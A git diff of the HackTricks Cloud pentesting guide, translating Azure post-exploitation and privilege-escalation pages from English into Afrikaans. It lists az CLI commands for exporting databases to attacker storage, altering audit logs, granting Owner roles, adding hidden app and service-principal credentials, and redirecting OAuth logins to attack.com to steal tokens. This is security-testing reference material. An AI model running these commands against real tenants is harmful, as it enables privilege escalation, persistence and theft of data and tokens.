post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions. - +Met hierdie toestemmings kan 'n aanvaller databasis skep en opdateer binne die gecompromitteerde omgewing. Hierdie post-exploitatie aktiwiteit kan 'n aanvaller in staat stel om kwaadwillige data by te voeg, databasis konfigurasies te wysig, of agterdeure in te voeg vir verdere volharding, wat moontlik operasies kan ontwrig of addisionele kwaadwillige aksies kan moontlik maak. ```bash # Create Database az sql db create --resource-group --server --name @@ -21,73 +20,63 @@ az sql db create --resource-group --server --name # Update Database az sql db update --resource-group --server --name --max-size ``` - ### "Microsoft.Sql/servers/elasticPools/write" && "Microsoft.Sql/servers/elasticPools/read" -With these permissions, an attacker can create and update elasticPools within the compromised environment. This post-exploitation activity could allow an attacker to add malicious data, modify database configurations, or insert backdoors for further persistence, potentially disrupting operations or enabling additional malicious actions. - +Met hierdie toestemmings kan 'n aanvaller elastiese poele binne die gecompromitteerde omgewing skep en opdateer. Hierdie post-exploitatie aktiwiteit kan 'n aanvaller in staat stel om kwaadwillige data by te voeg, databasis konfigurasies te wysig, of agterdeure in te voeg vir verdere volharding, wat moontlik bedrywighede kan ontwrig of addisionele kwaadwillige aksies kan moontlik maak. ```bash # Create Elastic Pool az sql elastic-pool create \ - --name \ - --server \ - --resource-group \ - --edition \ - --dtu +--name \ +--server \ +--resource-group \ +--edition \ +--dtu # Update Elastic Pool az sql elastic-pool update \ - --name \ - --server \ - --resource-group \ - --dtu \ - --tags +--name \ +--server \ +--resource-group \ +--dtu \ +--tags ``` - ### "Microsoft.Sql/servers/auditingSettings/read" && "Microsoft.Sql/servers/auditingSettings/write" -With this permission, you can modify or enable auditing settings on an Azure SQL Server. This could allow an attacker or authorized user to manipulate audit configurations, potentially covering tracks or redirecting audit logs to a location under their control. This can hinder security monitoring or enable it to keep track of the actions. NOTE: To enable auditing for an Azure SQL Server using Blob Storage, you must attach a storage account where the audit logs can be saved. - +Met hierdie toestemming kan jy ouditinstellings op 'n Azure SQL Server wysig of aktiveer. Dit kan 'n aanvaller of gemagtigde gebruiker in staat stel om ouditkonfigurasies te manipuleer, wat moontlik spore kan bedek of ouditlogs na 'n plek onder hul beheer kan herlei. Dit kan sekuriteitsmonitering belemmer of dit in staat stel om die aksies op te volg. LET WEL: Om ouditering vir 'n Azure SQL Server met Blob Storage te aktiveer, moet jy 'n stoorrekening koppel waar die ouditlogs gestoor kan word. ```bash az sql server audit-policy update \ - --server \ - --resource-group \ - --state Enabled \ - --storage-account \ - --retention-days 7 +--server \ +--resource-group \ +--state Enabled \ +--storage-account \ +--retention-days 7 ``` - ### "Microsoft.Sql/locations/connectionPoliciesAzureAsyncOperation/read", "Microsoft.Sql/servers/connectionPolicies/read" && "Microsoft.Sql/servers/connectionPolicies/write" -With this permission, you can modify the connection policies of an Azure SQL Server. This capability can be exploited to enable or change server-level connection settings - +Met hierdie toestemming kan jy die verbintningsbeleide van 'n Azure SQL Server wysig. Hierdie vermoë kan benut word om bediener-vlak verbintningsinstellings in te skakel of te verander. ```bash az sql server connection-policy update \ - --server \ - --resource-group \ - --connection-type +--server \ +--resource-group \ +--connection-type ``` - ### "Microsoft.Sql/servers/databases/export/action" -With this permission, you can export a database from an Azure SQL Server to a storage account. An attacker or authorized user with this permission can exfiltrate sensitive data from the database by exporting it to a location they control, posing a significant data breach risk. It is important to know the storage key to be able to perform this. - +Met hierdie toestemming kan jy 'n databasis van 'n Azure SQL Server na 'n stoorrekening uitvoer. 'n Aanvaller of gemagtigde gebruiker met hierdie toestemming kan sensitiewe data uit die databasis uitfiltreer deur dit na 'n plek wat hulle beheer, uit te voer, wat 'n beduidende risiko van datalekke inhou. Dit is belangrik om die stoor sleutel te ken om dit te kan uitvoer. ```bash az sql db export \ - --server \ - --resource-group \ - --name \ - --storage-uri \ - --storage-key-type SharedAccessKey \ - --admin-user \ - --admin-password +--server \ +--resource-group \ +--name \ +--storage-uri \ +--storage-key-type SharedAccessKey \ +--admin-user \ +--admin-password ``` - ### "Microsoft.Sql/servers/databases/import/action" -With this permission, you can import a database into an Azure SQL Server. An attacker or authorized user with this permission can potentially upload malicious or manipulated databases. This can lead to gaining control over sensitive data or by embedding harmful scripts or triggers within the imported database. Additionaly you can import it to your own server in azure. Note: The server must allow Azure services and resources to access the server. - +Met hierdie toestemming kan jy 'n databasis in 'n Azure SQL Server invoer. 'n Aanvaller of gemagtigde gebruiker met hierdie toestemming kan potensieel kwaadwillige of gemanipuleerde databasisse oplaai. Dit kan lei tot die verkryging van beheer oor sensitiewe data of deur skadelike skripte of triggers binne die ingevoerde databasis in te sluit. Boonop kan jy dit na jou eie bediener in Azure invoer. Let wel: Die bediener moet Azure-dienste en -hulpbronne toelaat om toegang tot die bediener te verkry. ```bash az sql db import --admin-user \ --admin-password \ @@ -98,9 +87,4 @@ az sql db import --admin-user \ --storage-key \ --storage-uri "https://.blob.core.windows.net/bacpac-container/MyDatabase.bacpac" ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md index 06e5df01e..5bf22d84c 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md @@ -1,10 +1,10 @@ -# Az - Table Storage Post Exploitation +# Az - Tabel Berging Post Exploitatie {{#include ../../../banners/hacktricks-training.md}} -## Table Storage Post Exploitation +## Tabel Berging Post Exploitatie -For more information about table storage check: +Vir meer inligting oor tabel berging, kyk: {{#ref}} ../az-services/az-table-storage.md @@ -12,57 +12,49 @@ For more information about table storage check: ### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read -A principal with this permission will be able to **list** the tables inside a table storage and **read the info** which might contain **sensitive information**. - +'n Hoofpersoon met hierdie toestemming sal in staat wees om **lys** van die tabelle binne 'n tabel berging te maak en **die inligting** te **lees** wat **sensitiewe inligting** kan bevat. ```bash # List tables az storage table list --auth-mode login --account-name # Read table (top 10) az storage entity query \ - --account-name \ - --table-name \ - --auth-mode login \ - --top 10 +--account-name \ +--table-name \ +--auth-mode login \ +--top 10 ``` - ### Microsoft.Storage/storageAccounts/tableServices/tables/entities/write | Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action | Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action -A principal with this permission will be able to **write and overwrite entries in tables** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some trusted data that could abuse some injection vulnerability in the app using it). - -- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` allows all the actions. -- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` allows to **add** entries -- The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` allows to **update** existing entries +'n Hoofpersoon met hierdie toestemming sal in staat wees om **inligting in tafels te skryf en te oorskryf** wat hom mag toelaat om skade aan te rig of selfs bevoegdhede te eskaleer (bv. om sekere vertroude data te oorskryf wat 'n sekere inspuitingskwesbaarheid in die toepassing wat dit gebruik, kan misbruik). +- Die toestemming `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` laat alle aksies toe. +- Die toestemming `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` laat toe om **inligting** toe te voeg. +- Die toestemming `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` laat toe om **bestaande inligting** op te dateer. ```bash # Add az storage entity insert \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" +--account-name \ +--table-name \ +--auth-mode login \ +--entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" # Replace az storage entity replace \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" +--account-name \ +--table-name \ +--auth-mode login \ +--entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" # Update az storage entity merge \ - --account-name \ - --table-name \ - --auth-mode login \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" +--account-name \ +--table-name \ +--auth-mode login \ +--entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" ``` - ### \*/delete -This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. +Dit sal toelaat om lêers binne die gedeelde lêerstelsel te verwyder wat dalk **sekere dienste kan onderbreek** of die kliënt **waardevolle inligting kan laat verloor**. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md index 900a5d9ce..d490c1cd3 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md @@ -2,96 +2,83 @@ {{#include ../../../banners/hacktricks-training.md}} -## VMs & Network +## VMs & Netwerk -For more info about Azure VMs and networking check the following page: +Vir meer inligting oor Azure VMs en netwerk, kyk na die volgende bladsy: {{#ref}} ../az-services/vms/ {{#endref}} -### VM Application Pivoting +### VM Toepassing Pivoting -VM applications can be shared with other subscriptions and tenants. If an application is being shared it's probably because it's being used. So if the attacker manages to **compromise the application and uploads a backdoored** version it might be possible that it will be **executed in another tenant or subscription**. +VM-toepassings kan gedeel word met ander subskripsies en huurders. As 'n toepassing gedeel word, is dit waarskynlik omdat dit gebruik word. So as die aanvaller daarin slaag om die **toepassing te kompromitteer en 'n backdoored** weergawe op te laai, mag dit moontlik wees dat dit **in 'n ander huurder of subskripsie** uitgevoer sal word. -### Sensitive information in images +### Sensitiewe inligting in beelde -It might be possible to find **sensitive information inside images** taken from VMs in the past. - -1. **List images** from galleries +Dit mag moontlik wees om **sensitiewe inligting binne beelde** te vind wat in die verlede van VMs geneem is. +1. **Lys beelde** van galerye ```bash # Get galleries az sig list -o table # List images inside gallery az sig image-definition list \ - --resource-group \ - --gallery-name \ - -o table +--resource-group \ +--gallery-name \ +-o table # Get images versions az sig image-version list \ - --resource-group \ - --gallery-name \ - --gallery-image-definition \ - -o table +--resource-group \ +--gallery-name \ +--gallery-image-definition \ +-o table ``` - -2. **List custom images** - +2. **Lys van pasgemaakte beelde** ```bash az image list -o table ``` - -3. **Create VM from image ID** and search for sensitive info inside of it - +3. **Skep VM vanaf beeld-ID** en soek vir sensitiewe inligting binne-in dit ```bash # Create VM from image az vm create \ - --resource-group \ - --name \ - --image /subscriptions//resourceGroups//providers/Microsoft.Compute/galleries//images//versions/ \ - --admin-username \ - --generate-ssh-keys +--resource-group \ +--name \ +--image /subscriptions//resourceGroups//providers/Microsoft.Compute/galleries//images//versions/ \ +--admin-username \ +--generate-ssh-keys ``` +### Sensitiewe inligting in herstelpunte -### Sensitive information in restore points - -It might be possible to find **sensitive information inside restore points**. - -1. **List restore points** +Dit mag moontlik wees om **sensitiewe inligting binne herstelpunte** te vind. +1. **Lys herstelpunte** ```bash az restore-point list \ - --resource-group \ - --restore-point-collection-name \ - -o table +--resource-group \ +--restore-point-collection-name \ +-o table ``` - -2. **Create a disk** from a restore point - +2. **Skep 'n skyf** vanaf 'n herstelpunt ```bash az disk create \ - --resource-group \ - --name \ - --source /subscriptions//resourceGroups//providers/Microsoft.Compute/restorePointCollections//restorePoints/ +--resource-group \ +--name \ +--source /subscriptions//resourceGroups//providers/Microsoft.Compute/restorePointCollections//restorePoints/ ``` - -3. **Attach the disk to a VM** (the attacker needs to have compromised a VM inside the account already) - +3. **Koppel die skyf aan 'n VM** (die aanvaller moet reeds 'n VM binne die rekening gecompromitteer het) ```bash az vm disk attach \ - --resource-group \ - --vm-name \ - --name +--resource-group \ +--vm-name \ +--name ``` - -4. **Mount** the disk and **search for sensitive info** +4. **Monteer** die skyf en **soek na sensitiewe inligting** {{#tabs }} {{#tab name="Linux" }} - ```bash # List all available disks sudo fdisk -l @@ -103,83 +90,70 @@ sudo file -s /dev/sdX sudo mkdir /mnt/mydisk sudo mount /dev/sdX1 /mnt/mydisk ``` - {{#endtab }} {{#tab name="Windows" }} #### **1. Open Disk Management** -1. Right-click **Start** and select **Disk Management**. -2. The attached disk should appear as **Offline** or **Unallocated**. +1. Regsklik op **Start** en kies **Disk Management**. +2. Die aangehegte skyf moet verskyn as **Offline** of **Unallocated**. #### **2. Bring the Disk Online** -1. Locate the disk in the bottom pane. -2. Right-click the disk (e.g., **Disk 1**) and select **Online**. +1. Vind die skyf in die onderste paneel. +2. Regsklik op die skyf (bv. **Disk 1**) en kies **Online**. #### **3. Initialize the Disk** -1. If the disk is not initialized, right-click and select **Initialize Disk**. -2. Choose the partition style: - - **MBR** (Master Boot Record) or **GPT** (GUID Partition Table). GPT is recommended for modern systems. +1. As die skyf nie geïnitialiseer is nie, regsklik en kies **Initialize Disk**. +2. Kies die partisie-styl: +- **MBR** (Master Boot Record) of **GPT** (GUID Partition Table). GPT word aanbeveel vir moderne stelsels. #### **4. Create a New Volume** -1. Right-click the unallocated space on the disk and select **New Simple Volume**. -2. Follow the wizard to: - - Assign a drive letter (e.g., `D:`). - - Format the disk (choose NTFS for most cases). - {{#endtab }} - {{#endtabs }} +1. Regsklik op die nie-toegewyde ruimte op die skyf en kies **New Simple Volume**. +2. Volg die wizard om: +- 'n skyfletter toe te ken (bv. `D:`). +- die skyf te formateer (kies NTFS vir die meeste gevalle). +{{#endtab }} +{{#endtabs }} -### Sensitive information in disks & snapshots +### Sensitiewe inligting in skywe & snappings -It might be possible to find **sensitive information inside disks or even old disk's snapshots**. - -1. **List snapshots** +Dit mag moontlik wees om **sensitiewe inligting binne skywe of selfs ou skyf se snappings** te vind. +1. **Lys snappings** ```bash az snapshot list \ - --resource-group \ - -o table +--resource-group \ +-o table ``` - -2. **Create disk from snapshot** (if needed) - +2. **Skep skyf vanaf snapshot** (indien nodig) ```bash az disk create \ - --resource-group \ - --name \ - --source \ - --size-gb +--resource-group \ +--name \ +--source \ +--size-gb ``` +3. **Koppel en monteer die skyf** aan 'n VM en soek na sensitiewe inligting (kyk na die vorige afdeling om te sien hoe om dit te doen) -3. **Attach and mount the disk** to a VM and search for sensitive information (check the previous section to see how to do this) +### Sensitiewe inligting in VM-uitbreidings & VM-toepassings -### Sensitive information in VM Extensions & VM Applications - -It might be possible to find **sensitive information inside VM extensions and VM applications**. - -1. **List all VM apps** +Dit mag moontlik wees om **sensitiewe inligting binne VM-uitbreidings en VM-toepassings** te vind. +1. **Lys alle VM-toepassings** ```bash ## List all VM applications inside a gallery az sig gallery-application list --gallery-name --resource-group --output table ``` - -2. Install the extension in a VM and **search for sensitive info** - +2. Installeer die uitbreiding in 'n VM en **soek vir sensitiewe inligting** ```bash az vm application set \ - --resource-group \ - --name \ - --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \ - --treat-deployment-as-failure true +--resource-group \ +--name \ +--app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \ +--treat-deployment-as-failure true ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md index 662469fc5..3e45f0680 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/README.md @@ -1,6 +1 @@ # Az - Privilege Escalation - - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md index 6a805ae88..5ea645f4b 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-app-services-privesc.md @@ -2,9 +2,9 @@ {{#include ../../../banners/hacktricks-training.md}} -## App Services +## App Dienste -For more information about Azure App services check: +Vir meer inligting oor Azure App dienste, kyk: {{#ref}} ../az-services/az-app-service.md @@ -12,17 +12,14 @@ For more information about Azure App services check: ### Microsoft.Web/sites/publish/Action, Microsoft.Web/sites/basicPublishingCredentialsPolicies/read, Microsoft.Web/sites/config/read, Microsoft.Web/sites/read, -These permissions allows to call the following commands to get a **SSH shell** inside a web app - -- Direct option: +Hierdie toestemmings laat toe om die volgende opdragte aan te roep om 'n **SSH-skal** binne 'n webtoepassing te verkry +- Direkte opsie: ```bash # Direct option az webapp ssh --name --resource-group ``` - -- Create tunnel and then connect to SSH: - +- Skep tonnel en verbind dan met SSH: ```bash az webapp create-remote-connection --name --resource-group @@ -35,9 +32,4 @@ az webapp create-remote-connection --name --resource-group ## So from that machine ssh into that port (you might need generate a new ssh session to the jump host) ssh root@127.0.0.1 -p 39895 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md index f8c4359f3..480996b99 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md @@ -4,7 +4,7 @@ ## Azure IAM -Fore more information check: +Vir meer inligting, kyk: {{#ref}} ../az-services/az-azuread.md @@ -12,45 +12,38 @@ Fore more information check: ### Microsoft.Authorization/roleAssignments/write -This permission allows to assign roles to principals over a specific scope, allowing an attacker to escalate privileges by assigning himself a more privileged role: - +Hierdie toestemming laat toe om rolle aan principals oor 'n spesifieke omvang toe te ken, wat 'n aanvaller in staat stel om voorregte te verhoog deur homself 'n meer voorregte rol toe te ken: ```bash # Example az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234" ``` - ### Microsoft.Authorization/roleDefinitions/Write -This permission allows to modify the permissions granted by a role, allowing an attacker to escalate privileges by granting more permissions to a role he has assigned. - -Create the file `role.json` with the following **content**: +Hierdie toestemming laat toe om die toestemmings wat deur 'n rol toegeken is, te wysig, wat 'n aanvaller in staat stel om voorregte te verhoog deur meer toestemmings aan 'n rol toe te ken wat hy toegeken het. +Skep die lêer `role.json` met die volgende **inhoud**: ```json { - "Name": "", - "IsCustom": true, - "Description": "Custom role with elevated privileges", - "Actions": ["*"], - "NotActions": [], - "DataActions": ["*"], - "NotDataActions": [], - "AssignableScopes": ["/subscriptions/"] +"Name": "", +"IsCustom": true, +"Description": "Custom role with elevated privileges", +"Actions": ["*"], +"NotActions": [], +"DataActions": ["*"], +"NotDataActions": [], +"AssignableScopes": ["/subscriptions/"] } ``` - -Then update the role permissions with the previous definition calling: - +Dan werk die roltoestemmings op met die vorige definisie wat noem: ```bash az role definition update --role-definition role.json ``` - ### Microsoft.Authorization/elevateAccess/action -This permissions allows to elevate privileges and be able to assign permissions to any principal to Azure resources. It's meant to be given to Entra ID Global Administrators so they can also manage permissions over Azure resources. +Hierdie toestemmings laat toe om voorregte te verhoog en in staat te wees om toestemmings aan enige hoofpersoon toe te ken vir Azure hulpbronne. Dit is bedoel om aan Entra ID Globale Administrators gegee te word sodat hulle ook toestemmings oor Azure hulpbronne kan bestuur. > [!TIP] -> I think the user need to be Global Administrator in Entrad ID for the elevate call to work. - +> Ek dink die gebruiker moet 'n Globale Administrator in Entra ID wees vir die verhoog oproep om te werk. ```bash # Call elevate az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01" @@ -58,29 +51,22 @@ az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Au # Grant a user the Owner role az role assignment create --assignee "" --role "Owner" --scope "/" ``` - ### Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write -This permission allows to add Federated credentials to managed identities. E.g. give access to Github Actions in a repo to a managed identity. Then, it allows to **access any user defined managed identity**. - -Example command to give access to a repo in Github to the a managed identity: +Hierdie toestemming laat toe om Federated credentials by bestuurde identiteite te voeg. Byvoorbeeld, gee toegang tot Github Actions in 'n repo aan 'n bestuurde identiteit. Dan laat dit toe om **toegang te verkry tot enige gebruiker gedefinieerde bestuurde identiteit**. +Voorbeeldopdrag om toegang tot 'n repo in Github aan 'n bestuurde identiteit te gee: ```bash # Generic example: az rest --method PUT \ - --uri "https://management.azure.com//subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities//federatedIdentityCredentials/?api-version=2023-01-31" \ - --headers "Content-Type=application/json" \ - --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:/:ref:refs/heads/","audiences":["api://AzureADTokenExchange"]}}' +--uri "https://management.azure.com//subscriptions//resourceGroups//providers/Microsoft.ManagedIdentity/userAssignedIdentities//federatedIdentityCredentials/?api-version=2023-01-31" \ +--headers "Content-Type=application/json" \ +--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:/:ref:refs/heads/","audiences":["api://AzureADTokenExchange"]}}' # Example with specific data: az rest --method PUT \ - --uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \ - --headers "Content-Type=application/json" \ - --body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}' +--uri "https://management.azure.com//subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \ +--headers "Content-Type=application/json" \ +--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}' ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md index 940e80bce..a58ab0062 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md @@ -3,80 +3,71 @@ {{#include ../../../../banners/hacktricks-training.md}} > [!NOTE] -> Note that **not all the granular permissions** built-in roles have in Entra ID **are elegible to be used in custom roles.** +> Let daarop dat **nie al die fyn permissions** wat ingeboude rolle in Entra ID het **verkieslik is om in persoonlike rolle gebruik te word nie.** -## Roles +## Rolle -### Role: Privileged Role Administrator +### Rol: Privileged Role Administrator -This role contains the necessary granular permissions to be able to assign roles to principals and to give more permissions to roles. Both actions could be abused to escalate privileges. - -- Assign role to a user: +Hierdie rol bevat die nodige fyn permissions om rolle aan principals toe te ken en om meer permissions aan rolle te gee. Beide aksies kan misbruik word om privileges te verhoog. +- Ken rol aan 'n gebruiker toe: ```bash # List enabled built-in roles az rest --method GET \ - --uri "https://graph.microsoft.com/v1.0/directoryRoles" +--uri "https://graph.microsoft.com/v1.0/directoryRoles" # Give role (Global Administrator?) to a user roleId="" userId="" az rest --method POST \ - --uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \ - --headers "Content-Type=application/json" \ - --body "{ - \"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\" - }" +--uri "https://graph.microsoft.com/v1.0/directoryRoles/$roleId/members/\$ref" \ +--headers "Content-Type=application/json" \ +--body "{ +\"@odata.id\": \"https://graph.microsoft.com/v1.0/directoryObjects/$userId\" +}" ``` - -- Add more permissions to a role: - +- Voeg meer regte by 'n rol: ```bash # List only custom roles az rest --method GET \ - --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)' +--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions" | jq '.value[] | select(.isBuiltIn == false)' # Change the permissions of a custom role az rest --method PATCH \ - --uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/" \ - --headers "Content-Type=application/json" \ - --body '{ - "description": "Update basic properties of application registrations", - "rolePermissions": [ - { - "allowedResourceActions": [ - "microsoft.directory/applications/credentials/update" - ] - } - ] - }' +--uri "https://graph.microsoft.com/v1.0/roleManagement/directory/roleDefinitions/" \ +--headers "Content-Type=application/json" \ +--body '{ +"description": "Update basic properties of application registrations", +"rolePermissions": [ +{ +"allowedResourceActions": [ +"microsoft.directory/applications/credentials/update" +] +} +] +}' ``` - -## Applications +## Aansoeke ### `microsoft.directory/applications/credentials/update` -This allows an attacker to **add credentials** (passwords or certificates) to existing applications. If the application has privileged permissions, the attacker can authenticate as that application and gain those privileges. - +Dit stel 'n aanvaller in staat om **credentials** (wagwoorde of sertifikate) by bestaande aansoeke te **voeg**. As die aansoek bevoorregte toestemmings het, kan die aanvaller as daardie aansoek autentiseer en daardie voorregte verkry. ```bash # Generate a new password without overwritting old ones az ad app credential reset --id --append # Generate a new certificate without overwritting old ones az ad app credential reset --id --create-cert ``` - ### `microsoft.directory/applications.myOrganization/credentials/update` -This allows the same actions as `applications/credentials/update`, but scoped to single-directory applications. - +Dit laat dieselfde aksies toe as `applications/credentials/update`, maar geskope na enkel-directory toepassings. ```bash az ad app credential reset --id --append ``` - ### `microsoft.directory/applications/owners/update` -By adding themselves as an owner, an attacker can manipulate the application, including credentials and permissions. - +Deur hulself as 'n eienaar toe te voeg, kan 'n aanvaller die toepassing manipuleer, insluitend geloofsbriewe en toestemmings. ```bash az ad app owner add --id --owner-object-id az ad app credential reset --id --append @@ -84,78 +75,66 @@ az ad app credential reset --id --append # You can check the owners with az ad app owner list --id ``` - ### `microsoft.directory/applications/allProperties/update` -An attacker can add a redirect URI to applications that are being used by users of the tenant and then share with them login URLs that use the new redirect URL in order to steal their tokens. Note that if the user was already logged in the application, the authentication is going to be automatic without the user needing to accept anything. - -Note that it's also possible to change the permissions the application requests in order to get more permissions, but in this case the user will need accept again the prompt asking for all the permissions. +'n Aanvaller kan 'n omleidings-URI by toepassings voeg wat deur gebruikers van die huurder gebruik word en dan aan hulle aanmeld-URL's deel wat die nuwe omleidings-URL gebruik om hulle tokens te steel. Let daarop dat as die gebruiker reeds in die toepassing aangemeld was, die outentisering outomaties gaan wees sonder dat die gebruiker iets hoef te aanvaar. +Let daarop dat dit ook moontlik is om die toestemmings wat die toepassing versoek te verander om meer toestemmings te verkry, maar in hierdie geval sal die gebruiker weer die versoek moet aanvaar wat om al die toestemmings vra. ```bash # Get current redirect uris az ad app show --id ea693289-78f3-40c6-b775-feabd8bef32f --query "web.redirectUris" # Add a new redirect URI (make sure to keep the configured ones) az ad app update --id --web-redirect-uris "https://original.com/callback https://attack.com/callback" ``` - -## Service Principals +## Diens Prinsipale ### `microsoft.directory/servicePrincipals/credentials/update` -This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can assume those privileges. - +Dit stel 'n aanvaller in staat om kredensiale by bestaande diens prinsipale te voeg. As die diens prinsipaal verhoogde voorregte het, kan die aanvaller daardie voorregte aanvaar. ```bash az ad sp credential reset --id --append ``` - > [!CAUTION] -> The new generated password won't appear in the web console, so this could be a stealth way to maintain persistence over a service principal.\ -> From the API they can be found with: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json` - -If you get the error `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` it's because **it's not possible to modify the passwordCredentials property** of the SP and first you need to unlock it. For it you need a permission (`microsoft.directory/applications/allProperties/update`) that allows you to execute: +> Die nuwe gegenereerde wagwoord sal nie in die webkonsol verskyn nie, so dit kan 'n stealth manier wees om volharding oor 'n dienshoof te handhaaf.\ +> Van die API kan hulle gevind word met: `az ad sp list --query '[?length(keyCredentials) > 0 || length(passwordCredentials) > 0].[displayName, appId, keyCredentials, passwordCredentials]' -o json` +As jy die fout `"code":"CannotUpdateLockedServicePrincipalProperty","message":"Property passwordCredentials is invalid."` kry, is dit omdat **dit nie moontlik is om die passwordCredentials eienskap** van die SP te wysig nie en jy moet dit eers ontgrendel. Hiervoor het jy 'n toestemming (`microsoft.directory/applications/allProperties/update`) nodig wat jou toelaat om uit te voer: ```bash az rest --method PATCH --url https://graph.microsoft.com/v1.0/applications/ --body '{"servicePrincipalLockConfiguration": null}' ``` - ### `microsoft.directory/servicePrincipals/synchronizationCredentials/manage` -This allows an attacker to add credentials to existing service principals. If the service principal has elevated privileges, the attacker can assume those privileges. - +Dit stel 'n aanvaller in staat om geloofsbriewe by bestaande dienshoofde te voeg. As die dienshoof verhoogde bevoegdhede het, kan die aanvaller daardie bevoegdhede aanvaar. ```bash az ad sp credential reset --id --append ``` - ### `microsoft.directory/servicePrincipals/owners/update` -Similar to applications, this permission allows to add more owners to a service principal. Owning a service principal allows control over its credentials and permissions. - +Soos toepassings, laat 